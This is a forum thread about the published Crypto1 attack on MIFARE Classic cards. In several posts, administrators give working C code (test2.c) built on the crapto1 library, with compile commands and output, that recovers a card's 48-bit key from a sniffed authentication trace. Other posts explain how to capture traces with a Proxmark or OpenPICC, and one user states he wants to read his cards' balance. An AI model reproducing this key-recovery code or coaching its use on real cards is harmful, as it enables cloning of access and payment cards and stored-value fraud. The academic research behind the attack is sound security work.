Topic: Crypto1 attack released
Hi,
The Crypto1 attack describe here : http://www.sos.cs.ru.nl/applications/rf … sorics.pdf has been released :
- roel
- Administrator
- Offline
Re: Crypto1 attack released
I verified this code. It seems to be working. Let us pray that system integrators informed their costumers!
Initialization values
UID: c1 08 41 6a
KEY: 62 be a1 92 fa 37
Decrypted random nonces
Nt: ab cd 19 49
Nt': 6b 01 17 99
Nt'': b8 68 c4 dc
Nr: 16 05 49 0d
Mifare Classic trace, []=Encrypted
Auth(00): 60 00 f5 7b
Nt: ab cd 19 49
[Nr,Nt']: 59! d5 92 0f! 15 b9 d5! 53!
[Nt'']: a7! 9a 3f! ee!// Test-file: test2.c
#include "crypto1.h"
#include "crapto1.h"
#include <stdio.h>
int main (void)
{
struct Crypto1State revstate;
uint64_t lfsr;
unsigned char* plfsr = (unsigned char*)&lfsr;
uint32_t uid = 0xc108416a;
uint32_t tag_challenge = 0xabcd1949;
uint32_t nr_enc = 0x59d5920f;
uint32_t reader_resonse = 0x15b9d553;
uint32_t tag_resonse = 0xa79a3fee;
uint32_t ks2 = reader_resonse ^ prng_successor(tag_challenge, 64);
uint32_t ks3 = tag_resonse ^ prng_successor(tag_challenge, 96);
printf("nt': %08x\n",prng_successor(tag_challenge, 64));
printf("nt'': %08x\n",prng_successor(tag_challenge, 96));
printf("ks2: %08x\n",ks2);
printf("ks3: %08x\n",ks3);
lfsr_recovery(&revstate, ks2, ks3);
lfsr_rollback(&revstate, 0, 0);
lfsr_rollback(&revstate, 0, 0);
lfsr_rollback(&revstate, nr_enc, 1);
lfsr_rollback(&revstate, uid ^ tag_challenge, 0);
crypto1_get_lfsr(&revstate, &lfsr);
printf("Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",plfsr[0],plfsr[1],plfsr[2],plfsr[3],plfsr[4],plfsr[5]);
return 0;
}./test2
nt': 6b011799
nt'': b868c4dc
ks2: 7eb8c2ca
ks3: 1ff2fb32
Found Key: [62 be a1 92 fa 37]Re: Crypto1 attack released
I compiled it all but how can i use it?
Last edited by Spion (2008-10-29 00:07:12)
Re: Crypto1 attack released
It work , got it.
Re: Crypto1 attack released
When I compile the code, many errors appear
Someone has the tool that decrypt the code? (I use Windows because dont know Linux)
I dont understand the tool.
Example:
I use a Omnikey 5321 reader and when I put the card, the sequence is:
************
ATR: 3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 00 01 00 00 00 00 6A
UID: BC 27 32 D9
MODEL: MIFARE STANDARD 1K
************
How do I decrypt this?
Last edited by rodolpho.pedra (2008-11-02 06:26:40)
Re: Crypto1 attack released
You need, the log of the transaction up to the end of the authentication
<-- UID (32 bits) = The one you got
<-- CHIP RND (32 bits)
--> READER RESPONSE/CHALLENGE (split in 2 x 32bit word)
<-- CHIP RESPONSE (32 bits)
You will not be able to get it with as an output of a Omnikey reader. You need an oscilloscope to recover the signal on the reader chip (or on the field directly but more challenging). For this, you need to launch a card reading to at least get an authentication.
But first of all reader the publication on Mifare, this is well explained ;-)
- roel
- Administrator
- Offline
Re: Crypto1 attack released
The ATR that the omnikey is showing is no real ATR/ATS for a MIFARE Classic card, since ISO14443A (layer3) does not support it. It is just the default string of the application.
So you actually only have retrieved the UID of the card so far. As rf_hack mentions, you need a trace of the transaction with the original reader to recover the key and see what (memory block) it is trying to read out.
Re: Crypto1 attack released
To discover the TRACE of the transaction, i need ProxMark?
If yes, please contact-me to show the price and a simple How to use document...becouse i dont understand programing and crypto.
I want only discover the balance of my cards.
Re: Crypto1 attack released
How to get it work in windows enviorment?
thanks in advance.
Re: Crypto1 attack released
rodolpho.pedra wrote:
To discover the TRACE of the transaction, i need ProxMark?
If yes, please contact-me to show the price and a simple How to use document...becouse i dont understand programing and crypto.I want only discover the balance of my cards.
you don't 'discover' the trace, you log (or trace) the communication..
And yes as far as I understand you can do this with ProxMark, also OPENPicc can be used
B.r.
Re: Crypto1 attack released
roel,
why can't I get the correct key with the newest crapto1 1.0 build? if I use the "test2.c" to calc. the key,
// Test-file: test2.c
#include "crypto1.h"
#include "crapto1.h"
#include <stdio.h>
int main (void)
{
struct Crypto1State revstate;
uint64_t lfsr;
unsigned char* plfsr = (unsigned char*)&lfsr;
uint32_t uid = 0xc108416a;
uint32_t tag_challenge = 0xabcd1949;
uint32_t nr_enc = 0x59d5920f;
uint32_t reader_resonse = 0x15b9d553;
uint32_t tag_resonse = 0xa79a3fee;
uint32_t ks2 = reader_resonse ^ prng_successor(tag_challenge, 64);
uint32_t ks3 = tag_resonse ^ prng_successor(tag_challenge, 96);
printf("nt': %08x\n",prng_successor(tag_challenge, 64));
printf("nt'': %08x\n",prng_successor(tag_challenge, 96));
printf("ks2: %08x\n",ks2);
printf("ks3: %08x\n",ks3);
lfsr_recovery(&revstate, ks2, ks3);
lfsr_rollback(&revstate, 0, 0);
lfsr_rollback(&revstate, 0, 0);
lfsr_rollback(&revstate, nr_enc, 1);
lfsr_rollback(&revstate, uid ^ tag_challenge, 0);
crypto1_get_lfsr(&revstate, &lfsr);
printf("Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",plfsr[0],plfsr[1],plfsr[2],plfsr[3],plfsr[4],plfsr[5]);
return 0;
}then the output is,
./test2
nt': 6b011799
nt'': b868c4dc
ks2: 7eb8c2ca
ks3: 1ff2fb32
Found Key: [41 87 b3 7e 04 50] // would be "[62 be a1 92 fa 37]" as u shownLast edited by shinechou (2009-02-12 11:06:51)
- roel
- Administrator
- Offline
Re: Crypto1 attack released
It still seems to work, the api got changed a little bit.
// Test-file: test2.c
#include "crapto1.h"
#include <stdio.h>
int main (void)
{
struct Crypto1State *revstate;
uint64_t lfsr;
unsigned char* plfsr = (unsigned char*)&lfsr;
uint32_t uid = 0xc108416a;
uint32_t tag_challenge = 0xabcd1949;
uint32_t nr_enc = 0x59d5920f;
uint32_t reader_response = 0x15b9d553;
uint32_t tag_response = 0xa79a3fee;
uint32_t ks2 = reader_response ^ prng_successor(tag_challenge, 64);
uint32_t ks3 = tag_response ^ prng_successor(tag_challenge, 96);
printf("nt': %08x\n",prng_successor(tag_challenge, 64));
printf("nt'': %08x\n",prng_successor(tag_challenge, 96));
printf("ks2: %08x\n",ks2);
printf("ks3: %08x\n",ks3);
revstate = lfsr_recovery(ks2, ks3);
lfsr_rollback(revstate, 0, 0);
lfsr_rollback(revstate, 0, 0);
lfsr_rollback(revstate, nr_enc, 1);
lfsr_rollback(revstate, uid ^ tag_challenge, 0);
crypto1_get_lfsr(revstate, &lfsr);
printf("Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",plfsr[0],plfsr[1],plfsr[2],plfsr[3],plfsr[4],plfsr[5]);
return 0;
}You can compille it the following way:
gcc -o test2 test2.c crapto1.c crypto1.cThe output is:
./test2
nt': 6b011799
nt'': b868c4dc
ks2: 7eb8c2ca
ks3: 1ff2fb32
Found Key: [62 be a1 92 fa 37]Re: Crypto1 attack released
dear roel,
thx a ton!
I'd gotten the correct result by analysis version 0.5, I omit the API-difference about "lfsr_recovery()" function at first.
Re: Crypto1 attack released
how to use code from http://code.google.com/p/crapto1 ?
----------------
Not all knows all.
Re: Crypto1 attack released
Does any one have any idea what this function does: lfsr_recovery_borked() ?
Re: Crypto1 attack released
phobophile wrote:
Does any one have any idea what this function does: lfsr_recovery_borked() ?
u can find it in the paper "http://www.sos.cs.ru.nl/applications/rf … sorics.pdf", just another lfsr_recovery implementation!
Re: Crypto1 attack released
Hello 
Could You explain me two things?
First:
What hardware i need to log the trace? OpenPICC? But it is hard to buy - why?
Maybe i should use OpenPCD?
For example I have sniffed communication by OpenPICC:
http://www.openpcd.org/dl/openpicc/opcd_samples
Decode it, i have example output:
Y
Z[07]0 Z[07]0 Z[07]0 Z[07]0 Z[07]0 Z[07]0 Z[07]0 Z[00]0 [11]1 ==0x00
X[07]1 X[07]1 X[07]1 X[07]1 X[07]1 X[07]1 X[07]1 X[07]1 X[07]1 ==0xFF
X[07]1 X[11]0 Z[07]0 Z[00]0 [11]1 X[11]0 Z[07]0 Z[00]0 [12]1 ==0x11
X[00]0 [14]1 X[11]0 Z[07]0 Z[00]0 [11]1 X[11]0 Z[00]0 [11]1 ==0x22
X[07]1 X[07]1 X[11]0 Z[00]0 [11]1 X[07]1 X[11]0 Z[00]0 [11]1 ==0x33
X[12]0 Z[00]0 [10]1 X[11]0 Z[07]0 Z[00]0 [11]1 X[00]0 [16]1 ==0x44
X[06]1 X[00]0 [15]1 X[00]0 [16]1 X[00]0 [14]1 X[00]0 [15]1 ==0x55
X[00]0 [16]1 X[06]1 X[12]0 Z[00]0 [11]1 X[06]1 X[00]0 [15]1 ==0x66
X[00]0 [16]1 X[00]0 [14]1 X[11]0 Z[00]0 [12]1 X[10]0 Z[08]0 ==0x4A
Z[07]0 Z[00]0 [11]1 X[07]1 X[11]0 Z[00]0 [11]1 X[10]0 Z[08]0 ==0x4C
CRC OKHow to know values, what i should to set in test.c code ?
uint32_t uid = 0xc108416a; //?
uint32_t tag_challenge = 0xabcd1949; //?
uint32_t nr_enc = 0x59d5920f; //?
uint32_t reader_response = 0x15b9d553; //?
uint32_t tag_response = 0xa79a3fee; //?Thank You for explain
Re: Crypto1 attack released
http://code.google.com/p/crapto1/
The new version was released.
Can someone explain to me what are the differences between lfsr_recovery 32 and 64 bits?
How do I change the code file test2 - that everything work properly?
Re: Crypto1 attack released
Widmo, I'm also need to know the differency of lfsr_recovery 32 and 64 bits?
It seems that it doesn't work properly, if just modify lfsr_recovery to 64 .
Re: Crypto1 attack released
BTW;
malloc always cann't automatically convert the according type ,show a error
invalid conversation from void to * (ohter ) error.
I use dev c++ 4.9.8
Any setting to avoid this error.
Re: Crypto1 attack released
I downloaded crapto1-v2.3.tgz from http://code.google.com/p/crapto1/. I think there is a buglet in file crypto1.c in function crypto1_create(). s is malloc'ed, then s->odd and s->even are used uninitialized in the loop. In previous versions, these fields were zero'ed at the start of the loop. Doing calloc() or zeroing the fields fixes this.
One more thing I ran into. Our project (http://www.rfidguardian.org) would like to run this software on our embedded device. Stack space is limited, and I get runtime errors because in crapto1.c lfsr_recovery64() the array uint32_t table[1<<16] is on the stack. If I malloc/free this thingy, things work again.
- adam@algroup.co.uk
- Moderator
- Offline
Re: Crypto1 attack released
Which reminds me, the demo applet here:
http://www.proxmark.org/files/index.php … recrack%2F
is still the bugged version... Can someone move the Makefile and mifarecrack.c from the upload section?
Thanks!
Re: Crypto1 attack released
adam@algroup.co.uk wrote:
Which reminds me, the demo applet here:
http://www.proxmark.org/files/index.php … recrack%2F
is still the bugged version... Can someone move the Makefile and mifarecrack.c from the upload section?
Thanks!
In which sense is this bugged? It looks alright to me.
Rutger
- adam@algroup.co.uk
- Moderator
- Offline
Re: Crypto1 attack released
sorry, not really "bugged", just the new version is better as it allows direct cut & paste from the log without having to edit out spaces and plings etc. The new version and it's associated Makefile is in the upload section and just needs copying over the top of the version in the various software section...